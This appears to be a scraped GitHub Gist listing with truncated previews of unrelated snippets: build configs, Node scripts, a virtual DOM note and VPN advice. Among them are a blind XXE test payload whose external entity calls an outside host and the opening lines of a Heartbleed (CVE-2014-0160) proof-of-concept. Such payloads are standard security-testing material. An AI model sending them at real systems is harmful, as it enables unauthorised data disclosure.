I no longer mantain this list. There are lots of other very comprehensive JavaScript link lists out there. Please see those, instead (Google "awesome JavaScript" for a start).
Jeremy Buis jeremybuis
ericelliott
/ essential-javascript-links.md
Last active
March 22, 2025 17:28
Essential JavaScript Links
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This script will boot app.js with the number of workers | |
| // specified in WORKER_COUNT. | |
| // | |
| // The master will respond to SIGHUP, which will trigger | |
| // restarting all the workers and reloading the app. | |
| var cluster = require('cluster'); | |
| var workerCount = process.env.WORKER_COUNT || 2; | |
| // Defines what each worker needs to run |
takeshixx
/ hb-test.py
Last active
April 14, 2025 17:04
OpenSSL heartbeat PoC with STARTTLS support.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| """ | |
| Author: takeshix <[email protected]> | |
| PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]). | |
| Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP. | |
| """ | |
| import sys,struct,socket | |
| from argparse import ArgumentParser |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| express = require 'express' | |
| sysPath = require 'path' | |
| httpProxy = require 'http-proxy'; | |
| request = require 'request'; | |
| apiProxy = httpProxy.createServer({ | |
| target:'http://localhost:3000' | |
| }); |
booleanbetrayal
/ Gruntfile.js
Last active
November 23, 2024 05:09
Example GruntJS configuration for a replacement to the Sprockets Rails asset pipeline
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict'; | |
| module.exports = function(grunt) { | |
| // load all grunt tasks | |
| require('matchdep').filterDev('grunt-*').forEach(grunt.loadNpmTasks); | |
| // configurable paths | |
| var paths = { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /// | |
| var pkg = require("./package.json") | |
| , rimraf = require("rimraf") | |
| , gulp = require("gulp") | |
| , gutil = require("gulp-util") | |
| , filter = require("gulp-filter") | |
| , plumber = require("gulp-plumber") | |
| , concat = require("gulp-concat") | |
| gulp.task("clean", function() { |
Raynos
/ 0virtual-dom.md
Last active
December 21, 2024 01:56
There was a [great article][1] about how react implements it's virtual DOM. There are some really interesting ideas in there but they are deeply buried in the implementation of the React framework.
However, it's possible to implement just the virtual DOM and diff algorithm on it's own as a set of independent modules.
You should never let passwords or private data be transmitted over an untrusted network (your neighbor’s, the one at Starbucks or the company) anyway, but on a hacker congress like the #30C3, this rule is almost vital.
Hackers get bored easily, and when they’re bored, they’re starting to look for things to play with. And a network with several thousand connected users is certainly an interesting thing to play with. Some of them might start intercepting the data on the network or do other nasty things with the packets that they can get.
If these packets are encrypted, messing with them is much harder (but not impossible! – see the end of this article). So you want your packets to be always encrypted. And the best way to do that is by using a VPN.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function (root) { | |
| var type = function (o) { | |
| // handle null in old IE | |
| if (o === null) { | |
| return 'null'; | |
| } | |
| // handle DOM elements |